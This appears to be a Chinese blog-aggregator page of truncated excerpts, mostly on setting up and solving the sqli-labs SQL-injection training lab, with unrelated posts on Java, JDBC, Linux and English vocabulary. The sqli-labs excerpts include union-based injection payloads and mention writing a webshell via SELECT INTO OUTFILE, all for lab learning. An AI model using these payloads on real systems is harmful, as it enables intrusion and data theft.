1、下载地址：小皮：Windows版phpstudy下载-小皮面板(phpstudy)(xp.cn)Sqli：mirrors/audi-1/sqli-labs·GitCode2、安装小皮3、把sqli压缩包放进去解压，找到$dbpass=''单引号里面填root具体路径如下4、打开小皮，启动apache、mysql，访问：http://127.0.0.1/sqli-labs-master/搭建完成
SQL注入：sqli-labs靶场通关（1-37关）未知百分百安全数据库 sql 数据库通关网络安全安全 web安全安全威胁分析
SQL注入系列文章：初识SQL注入-CSDN博客SQL注入：联合查询的三个绕过技巧-CSDN博客SQL注入：报错注入-CSDN博客SQL注入：盲注-CSDN博客SQL注入：二次注入-CSDN博客SQL注入：orderby注入-CSDN博客SQL注入：宽字节注入-CSDN博客目录第1关（联合查询）第2关（数字型）第3关（'闭合）第4关（")闭合）第5关（报错注入）第6关（"闭合）第7关（secure
MAC下搭建PHP开发环境及sqli-labs安装 2mpossible
为了学习web，首先要搭建php开发环境，由于我用的是mac，所以首选用MAMP来搭建首先确保互联网共享状态是关闭的，在系统偏好设置的共享里面设置然后安装MAMP安装好了会有MAMP和MAMPPRO，打开MAMP，StartServers在localhost:8888就会有我们的服务点击Preferences，在Ports修改Apache和Mysql端口为80和3306然后我为了方便更改我的默认目
sqli-labs第一关的闯关修书成林 mysql sql database
第一关：单引号错误SQL的注入最终是为了拿到数据库的文件或者数据。刚进页面，显示需要输入id。于是我们使用在地址栏后面加上?id=1第二行的黄色字体是我自己添加的内容，表示被传入mysql执行的语句（方便我加深理解），绿色字体是正常显示的内容。如果你也想要显示此语句，可以在安装目录下的此页面的php当中,加入这条语句echo“$sql”判断有无注入点：老规矩：加上and1=1；and1=2，看一下
sqli-labs第一关详解纯新手向含原理 On3_Thing
Less-01为方便初学者理解，更改了sqli-labs的源码，以显示sql语句后期学习中需要自己推理初始页面在url后面用get传值id=1，随后能看到网页出现变化如下图不断更改上传id的值，会有不同的用户信息显示。按递增顺序直到14为止，即(1~14)判断注入点是否存在且能否使用一般使用单引号进行判断，加到url后面出现报错内容大致为LIMIT0,1附近有语法错误。为什么要使用单引号进行判断实
sqli-labs第一关瓜子壳、数据库
1.判断是否存在注入，注入是字符型还是数字型??id=1and1=1?id=1and1=2因为输入and1=1与and1=2回显正常，所以该地方不是数字型。?id=1'?id=1'--+输入单引号后报错，在单引号后添加--+恢复正常，说明存在字符注入2.猜解SQL查询语句中的字段数?id=1'orderby3--+?id=1'orderby4--+利用二分法尝试，得到列数为33.确定回显位置将id
安全小记-sqli-labs闯关九字宸安全
1.安装靶场介绍：SQLI，sqlinjection，我们称之为sql注入。何为sql，英文：StructuredQueryLanguage，叫做结构化查询语言。常见的结构化数据库有MySQL，MSSQL,Oracle以及Postgresql。Sql语言就是我们在管理数据库时用到的一种。在我们的应用系统使用sql语句进行管理应用数据库时，往往采用拼接的方式形成一条完整的数据库语言，而危险的是，在拼
sqli-labs闯关随记拓海AE sqli-labs闯关 sql 数据库网络安全
前言：做了sqli-labs的接近三十关，在这里简单做个总结，以下是自己在闯关中所学到的知识，包括在网上查询、参考别人文章以及资料所理解到的。这个随记比较杂乱，都是我边学边写的，希望大家凑合着看哈。会不定时更新，如果后面内容较多，会考虑分为上下篇。1、sql注入分类基于从服务器接收到的响应：基于错误的sql注入联合查询的类型堆查询注射sql盲注：基于布尔sql盲注基于时间的sql盲注基于报错的sq
sqli-labs闯关鱼不知忆安全
目录1.安装靶场2.了解几个sql常用知识2.1联合查询union用法2.2MySQL中的通配符：2.3常用函数2.4数据分组3.mysql中重要的数据库和表4.开始闯关4.1Less-14.1.1首先进行一次常规的注入4.1.2深入解析1.安装靶场1.首先推荐使用github下载靶场源码https://github.com/Audi-1/sqli-labs2.接着你需要phpstudy即小皮面板
sqli-labs-master 下载、搭建 etc _ life 数据库
sqli-labs-mastersqli-labs-master是一个帮助用户学习和测试SQL注入漏洞的开源项目。它提供了一系列的环境，用户可以在这些环境中进行实验，学习如何检测、利用和防御SQL注入攻击。sqli-labs下载地址：github.com/Audi-1/sqli-labs搭建搭建sqli-labs借助PHPstudy来完成，我们将下载好的sqli-labs-master包解压至PH
sqli-labs靶场第一关详解赛sir 网络安全靶场 sql 靶场 mysql
目录sqlilabs靶场第一关0.sql注入解释0.1什么是sql注入0.2sql注入的原理0.3sql注入方法0.3.1数字型注入0.3.2字符型注入1.注入第一步判断请求方式、类型1.1打开我自己本地的靶场http://sql.com/Less-1/（上一期靶场搭建：http://t.csdnimg.cn/mzLeq）1.2.进行手工测试判断有没有sql注入？1.3?id=11.4and1=1
sqli-labs靶场（1-6关）沧海一粟@星火燎原 sql 数据库
1、第一关测试id=1id=1'加一个引号报错，两个引号正常，应该是字符，还有回显猜测字段长度id=1'orderby3--+id=1'orderby4--+字段长度为三，接下来确定位置：id=1'and1=2unionselect1,2,3--+查出库名,及版本号id=1'and1=2unionselect1,database(),version()--+接下来爆出所有表名id=1'and1=2
sqli-labs靶场第七关沧海一粟@星火燎原数据库 oracle
7、第七关id=1'--+单引号报错,id=1"--+双引号不报错,可以判断是单引号闭合id=1')--+也报错，尝试两个括号闭合，id=1'))--+不报错接下来用脚本爆库importstringimportrequestsnumbers=[1,2,3,4,5,6,7,8,9,0]letters2=list(string.ascii_lowercase)fuhao=['~',"@","$","^
get基于报错的sql注入利用-读敏感文件和写入一句话木马狗蛋的博客之旅 Web安全渗透 sql 数据库
环境准备：构建完善的安全渗透测试环境：推荐工具、资源和下载链接_渗透测试靶机下载-CSDN博客基础：GET基于报错的sql注入利用-脱库-CSDN博客1、selectintooutfile或dumpfile写入一句话马这里用Sqli-labs靶场的第一关做演示，之前演示过改关卡的闭合符是单引号，靶场地址：http://127.0.0.1/sqlilabs/less-1/?id=1判断MysQL的存
WEB安全渗透测试-pikachu&DVWA&sqli-labs&upload-labs&xss-labs靶场搭建（超详细） aozhan001 web安全 xss 安全网络安全
目录phpstudy下载安装一，pikachu靶场搭建1.下载pikachu2.新建一个名为pikachu的数据库3.pikachu数据库配置编辑4.创建网站编辑5.打开网站6.初始化安装二，DVWA靶场搭建1.下载DVWA2.创建一个名为dvwa的数据库3.DVWA数据库配置4.创建网站5.打开登入：http://localhost/dvwa/三，sqli-labs靶场搭建1.下载sqli-la
sqli-labs 的安装 f1a94e9a1ea7
sqli-labs下载：https://github.com/Audi-1/sqli-labs解压后放入phpstudy的www目录下打开sqli-labs文件下sql-connections/db-creds.inc文件修改密码：$dbpass='root'phpstudy创建网站，域名为解压的文件名，php版本要在7以下创建好后打开网站，点击Setup/resetDatabaseforlabs
Web安全漏洞专项靶场—SQL注入—docker环境—sqli-labs靶场—详细通关指南 Dr.Neos Web安全漏洞专项靶场 mysql php 渗透测试 docker 数据库 web安全网络安全
SQL注入—sqli-labs靶场零、前言一、环境搭建①、VirtualBox②、KaliLinux③、Docker二、闯关开始1、Less-1—'—union2、Less-2—数字型—union3、Less-3—')—union4、Less-4—")—union5、Less-5—'—布尔盲注6、Less-6—"—布尔盲注7、Less-7—'))7.1—布尔盲注7.2—文件写入8、Less-8—'
CTF 三大测试靶场搭建：DVWA、SQLi-LABS、upload-labs 靶场部署教程（VM + CentOS 7 + Docker）零号·镜瞳渗透测试靶场搭建网络安全 web安全 linux centos 系统安全
目录前言靶场介绍DVWASQLi-LABSupload-labs靶场搭建CentOS7虚拟环境准备靶场环境部署系统环境配置Docker环境配置下载Docker配置Docker镜像源启动docker靶场配置靶场镜像抓取创建并运行docker容器靶场的访问&靶场的初始化DVWA靶场重置SQLi-LABS靶场重置upload-labs靶场重置总结补充：docker靶场高级使用进入docker靶场dock
java观察者模式 3213213333332132 java 设计模式游戏观察者模式
观察者模式——顾名思义，就是一个对象观察另一个对象，当被观察的对象发生变化时，观察者也会跟着变化。在日常中，我们配java环境变量时，设置一个JAVAHOME变量,这就是被观察者，使用了JAVAHOME变量的对象都是观察者，一旦JAVAHOME的路径改动，其他的也会跟着改动。这样的例子很多，我想用小时候玩的老鹰捉小鸡游戏来简单的描绘观察者模式。老鹰会变成观察者，母鸡和小鸡是
TFS RESTful API 模拟上传测试 ronin47
TFS RESTful API 模拟上传测试。　　细节参看这里：https://github.com/alibaba/nginx-tfs/blob/master/TFS_RESTful_API.markdown 模拟POST上传一个图片： curl --data-binary @/opt/tfs.png http
PHP常用设计模式单例, 工厂, 观察者, 责任链, 装饰, 策略,适配,桥接模式 dcj3sjt126com 设计模式 PHP
// 多态, 在JAVA中是这样用的, 其实在PHP当中可以自然消除, 因为参数是动态的, 你传什么过来都可以, 不限制类型, 直接调用类的方法 abstract class Tiger { public abstract function climb(); } class XTiger extends Tiger { public function climb()
hibernate 171815164 Hibernate
main,save Configuration conf =new Configuration().configure(); SessionFactory sf=conf.buildSessionFactory(); Session sess=sf.openSession(); Transaction tx=sess.beginTransaction(); News a=new
Ant实例分析 g21121 ant
下面是一个Ant构建文件的实例，通过这个实例我们可以很清楚的理顺构建一个项目的顺序及依赖关系，从而编写出更加合理的构建文件。下面是build.xml的代码： <?xml version="1
[简单]工作记录_接口返回405原因 53873039oycg 工作
最近调接口时候一直报错，错误信息是: responseCode:405 responseMsg:Method Not Allowed 接口请求方式Post.
关于java.lang.ClassNotFoundException 和 java.lang.NoClassDefFoundError 的区别程序员是怎么炼成的
真正完成类的加载工作是通过调用 defineClass来实现的；而启动类的加载过程是通过调用 loadClass来实现的；就是类加载器分为加载和定义 protected Class<?> findClass(String name) throws ClassNotFoundExcept
JDBC学习笔记-JDBC详细的操作流程 aijuans jdbc
所有的JDBC应用程序都具有下面的基本流程：　　1、加载数据库驱动并建立到数据库的连接。　　2、执行SQL语句。　　3、处理结果。　　4、从数据库断开连接释放资源。下面我们就来仔细看一看每一个步骤：其实按照上面所说每个阶段都可得单独拿出来写成一个独立的类方法文件。共别的应用来调用。 1、加载数据库驱动并建立到数据库的连接： Html代码 St
rome创建rss antonyup_2006 tomcat cms xml struts Opera
引用 1.RSS标准 RSS标准比较混乱，主要有以下3个系列 RSS 0.9x / 2.0 : RSS技术诞生于1999年的网景公司(Netscape)，其发布了一个0.9版本的规范。2001年，RSS技术标准的发展工作被Userland Software公司的戴夫温那(Dave Winer)所接手。陆续发布了0.9x的系列版本。当W3C小组发布RSS 1.0后，Dave W
html表格和表单基础百合不是茶 html 表格表单 meta 锚点
第一次用html来写东西,感觉压力山大,每次看见别人发的都是比较牛逼的再看看自己什么都还不会, html是一种标记语言,其实很简单都是固定的格式 _----------------------------------------表格和表单表格是html的重要组成部分,表格用在body里面的主要用法如下; <table> &
ibatis如何传入完整的sql语句 bijian1013 java sql ibatis
ibatis如何传入完整的sql语句？进一步说，String str ="select * from test_table"，我想把str传入ibatis中执行，是传递整条sql语句。解决办法： <
精通Oracle10编程SQL(14)开发动态SQL bijian1013 oracle 数据库 plsql
/* *开发动态SQL */ --使用EXECUTE IMMEDIATE处理DDL操作 CREATE OR REPLACE PROCEDURE drop_table(table_name varchar2) is sql_statement varchar2(100); begin sql_statement:='DROP TABLE '||table_name;
【Linux命令】Linux工作中常用命令 bit1129 linux命令
不断的总结工作中常用的Linux命令 1.查看端口被哪个进程占用通过这个命令可以得到占用8085端口的进程号，然后通过ps -ef|grep 进程号得到进程的详细信息 netstat -anp | grep 8085 察看进程ID对应的进程占用的端口号 netstat -anp | grep 进程ID &
优秀网站和文档收集白糖_ 网站
集成 Flex, Spring, Hibernate 构建应用程序性能测试工具-JMeter Hmtl5-IOCN网站 Oracle精简版教程网站鸟哥的linux私房菜 Jetty中文文档 50个jquery必备代码片段 swfobject.js检测flash版本号工具
angular.extend boyitech AngularJS angular.extend AngularJS API
angular.extend 复制src对象中的属性去dst对象中. 支持多个src对象. 如果你不想改变一个对象，你可以把dst设为空对象{}: var object = angular.extend({}, object1, object2). 注意: angular.extend不支持递归复制. 使用方法: angular.extend(dst, src); 参数:
java-谷歌面试题-设计方便提取中数的数据结构 bylijinnan java
网上找了一下这道题的解答，但都是提供思路，没有提供具体实现。其中使用大小堆这个思路看似简单，但实现起来要考虑很多。以下分别用排序数组和大小堆来实现。使用大小堆： import java.util.Arrays; public class MedianInHeap { /** * 题目：设计方便提取中数的数据结构 * 设计一个数据结构，其中包含两个函数，1.插
ajaxFileUpload 针对 ie jquery 1.7+不能使用问题修复版本 Chen.H ajaxFileUpload ie6 ie7 ie8 ie9
jQuery.extend({ handleError: function( s, xhr, status, e ) { // If a local callback was specified, fire it if ( s.error ) { s.error.call( s.context || s, xhr, status, e ); }
[机器人制造原则]机器人的电池和存储器必须可以替换 comsci 制造
机器人的身体随时随地可能被外来力量所破坏,但是如果机器人的存储器和电池可以更换,那么这个机器人的思维和记忆力就可以保存下来,即使身体受到伤害,在把存储器取下来安装到一个新的身体上之后,原有的性格和能力都可以继续维持..... 另外,如果一
Oracle Multitable INSERT 的用法 daizj oracle
转载Oracle笔记-Multitable INSERT 的用法 http://blog.chinaunix.net/uid-8504518-id-3310531.html 一、Insert基础用法语法： Insert Into 表名 (字段1,字段2,字段3...） Values (值1,
专访黑客历史学家George Dyson datamachine on
20世纪最具威力的两项发明——核弹和计算机出自同一时代、同一群年青人。可是，与大名鼎鼎的曼哈顿计划（第二次世界大战中美国原子弹研究计划）相比，计算机的起源显得默默无闻。出身计算机世家的历史学家George Dyson在其新书《图灵大教堂》（Turing’s Cathedral）中讲述了阿兰·图灵、约翰·冯·诺依曼等一帮子天才小子创造计算机及预见计算机未来
小学6年级英语单词背诵第一课 dcj3sjt126com english word
always 总是 rice 水稻，米饭 before 在...之前 live 生活，居住 usual 通常的 early 早的 begin 开始 month 月份 year 年 last 最后的 east 东方的 high 高的 far 远的 window 窗户 world 世界 than 比...更
在线IT教育和在线IT高端教育 dcj3sjt126com 教育
codecademy http://www.codecademy.com codeschool https://www.codeschool.com teamtreehouse http://teamtreehouse.com lynda http://www.lynda.com/ Coursera https://www.coursera.
Struts2 xml校验框架所定义的校验文件蕃薯耀 Struts2 xml校验 Struts2 xml校验框架 Struts2校验
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2015年7月11日 15:54:59 星期六 http://fa
mac下安装rar和unrar命令 hanqunfeng mac
1.下载：http://www.rarlab.com/download.htm 选择 RAR 5.21 for Mac OS X 2.解压下载后的文件 tar -zxvf rarosx-5.2.1.tar 3.cd rar sudo install -c -o $USER unrar /bin #输入当前用户登录密码 sudo install -c -o $USER rar
三种将list转换为map的方法 jackyrong list
在本文中，介绍三种将list转换为map的方法： 1）传统方法假设有某个类如下 class Movie { private Integer rank; private String description; public Movie(Integer rank, String des
年轻程序员需要学习的5大经验 lampcy 工作 PHP 程序员
在过去的7年半时间里，我带过的软件实习生超过一打，也看到过数以百计的学生和毕业生的档案。我发现很多事情他们都需要学习。或许你会说，我说的不就是某种特定的技术、算法、数学，或者其他特定形式的知识吗？没错，这的确是需要学习的，但却并不是最重要的事情。他们需要学习的最重要的东西是“自我规范”。这些规范就是：尽可能地写出最简洁的代码；如果代码后期会因为改动而变得凌乱不堪就得重构；尽量删除没用的代码，并添加
评“女孩遭野蛮引产致终身不育 60万赔偿款1分未得”医腐深入骨髓 nannan408
先来看南方网的一则报道：再正常不过的结婚、生子，对于29岁的郑畅来说，却是一个永远也无法实现的梦想。从2010年到2015年，从24岁到29岁，一张张新旧不一的诊断书记录了她病情的同时，也清晰地记下了她人生的悲哀。　　粗暴手术让人发寒　　2010年7月，在酒店做服务员的郑畅发现自己怀孕了，可男朋友却联系不上。在没有和家人商量的情况下，她决定堕胎。　　12月5日，
使用jQuery为input输入框绑定回车键事件 VS 为a标签绑定click事件 Everyday都不同 jsp input 回车键绑定 click enter
假设如题所示的事件为同一个，必须先把该js函数抽离出来，该函数定义了监听的处理： function search() { //监听函数略...... } 为input框绑定回车事件，当用户在文本框中输入搜索关键字时，按回车键，即可触发search(): //回车绑定 $(".search").keydown(fun
EXT学习记录 tntxia ext
1. 准备（1）官网：http://www.sencha.com/ 里面有源代码和API文档下载。 EXT的域名已经从www.extjs.com改成了www.sencha.com ，但extjs这个域名会自动转到sencha上。（2）帮助文档：想要查看EXT的官方文档的话，可以去这里h
mybatis3的mapper文件报Referenced file contains errors xingguangsixian mybatis
最近使用mybatis.3.1.0时无意中碰到一个问题： The errors below were detected when validating the file "mybatis-3-mapper.dtd" via the file "account-mapper.xml". In most cases these errors can be d